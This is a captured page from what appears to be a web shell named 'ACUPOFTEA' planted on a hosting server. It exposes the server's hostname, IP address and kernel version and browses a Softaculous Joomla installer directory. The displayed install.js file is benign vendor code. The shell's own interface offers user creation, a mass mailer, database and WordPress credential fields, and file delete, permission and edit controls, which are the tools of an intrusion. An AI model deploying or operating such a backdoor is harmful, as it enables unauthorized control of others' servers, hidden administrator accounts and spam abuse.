System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
var
/
softaculous
/
joomla54
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
install.js
////////////////////////////////////////////////////////////// // install.js // Checks the installation form of the software being // installed by SOFTACULOUS // NOTE: 1) Only formcheck() function will be called. // 2) A software Vendor can use the same name for every // field to be checked as in install.xml . It can be // called using $('fieldname').value or any property // 3) Must Return true or false // ---------------------------------------------------------- // Please Read the Terms of use at http://www.softaculous.com // ---------------------------------------------------------- // (c)Softaculous Inc. ////////////////////////////////////////////////////////////// function formcheck(){ //Check the Admin Email if(window.check_punycode){ if(!check_punycode($('admin_email').value)){ alert('{{err_ademail}}'); return false; } return true; } return true; }; // Update the in dir function update_joomla54_indir(){ if(joomla54_retries >= 5){ return; } if(typeof jQuery('#softdirectory').val() == "undefined"){ joomla54_retries++; setTimeout('update_joomla54_indir();', 500); return; } var softdirectory = jQuery('#softdirectory').val(); if(softdirectory == 'joomla54'){ jQuery('#softdirectory').val('joomla'); } } var joomla54_retries = 0; update_joomla54_indir(); jQuery(document).ready(function(){ // Joomla requires password to be minimum 12 chars so generate random accordingly if(globals_rand_pass > 0){ setTimeout('joomla54_rand_pass();', 500); } jQuery( ".generate-password" ).on( "click", function(){ joomla54_rand_pass(); }); }); function joomla54_rand_pass(){ try{ jQuery("#admin_pass").val(randstr(12, 1, globals_pass_strength)); check_pass_strength(); } catch(e){} }
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-10-17 09:39:12
..
DIR
-
drwxr-xr-x
2025-10-25 09:38:52
images
DIR
-
drwxr-xr-x
2025-10-17 09:39:12
languages
DIR
-
drwxr-xr-x
2025-10-17 09:39:12
php53
DIR
-
drwxr-xr-x
2025-10-17 09:39:12
php56
DIR
-
drwxr-xr-x
2025-10-17 09:39:12
php71
DIR
-
drwxr-xr-x
2025-10-17 09:39:12
php81
DIR
-
drwxr-xr-x
2025-10-17 09:39:12
php82
DIR
-
drwxr-xr-x
2025-10-17 09:39:12
clone.php
text/x-php
3.99 KB
-rw-r--r--
2025-10-16 08:29:16
configuration.php
text/x-php
2.16 KB
-rw-r--r--
2025-10-16 07:23:46
edit.php
text/x-php
5.81 KB
-rw-r--r--
2025-10-16 08:29:16
edit.xml
text/html
629 B
-rw-r--r--
2025-10-16 07:23:46
extend.php
text/x-php
8.82 KB
-rw-r--r--
2025-10-16 08:29:16
fileindex.php
text/plain
242 B
-rw-r--r--
2025-10-16 07:23:46
import.php
text/x-php
8.86 KB
-rw-r--r--
2025-10-16 08:29:16
info.xml
text/html
6.95 KB
-rw-r--r--
2025-10-16 07:23:46
install.js
text/plain
1.75 KB
-rw-r--r--
2025-10-16 07:23:46
install.php
text/x-php
21.35 KB
-rw-r--r--
2025-10-16 08:29:16
install.xml
text/html
3.06 KB
-rw-r--r--
2025-10-16 07:23:46
md5
text/plain
10.97 KB
-rw-r--r--
2025-10-16 08:29:16
notes.txt
text/plain
3.71 KB
-rw-r--r--
2025-10-16 07:23:46
restore.php
text/x-php
2.23 KB
-rw-r--r--
2025-10-16 08:29:16
sign_on.php
text/x-php
2.35 KB
-rw-r--r--
2025-10-16 07:23:46
update_pass.php
text/x-php
497 B
-rw-r--r--
2025-10-16 07:23:46
upgrade.php
text/x-php
54.67 KB
-rw-r--r--
2025-10-16 08:29:16
upgrade.xml
text/plain
630 B
-rw-r--r--
2025-10-16 07:23:46
~ ACUPOFTEA - mail.ontime-ae.com